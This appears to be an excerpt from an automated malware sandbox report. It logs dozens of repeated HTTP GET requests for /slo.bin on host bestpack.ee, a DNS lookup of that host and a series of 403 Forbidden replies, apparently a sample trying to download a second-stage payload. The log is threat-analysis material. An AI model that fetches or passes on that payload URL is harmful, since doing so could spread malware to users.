      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /slo.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: bestpack.ee
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 16:58:48 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 16:58:59 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 16:59:11 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 16:59:22 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 16:59:34 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 16:59:45 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 16:59:56 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:00:08 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:00:19 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:00:31 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:00:42 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:00:53 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:01:05 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:01:16 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:01:28 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:01:39 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:01:50 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:02:02 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:02:13 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:02:24 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:02:36 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Sep 2024 17:02:47 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
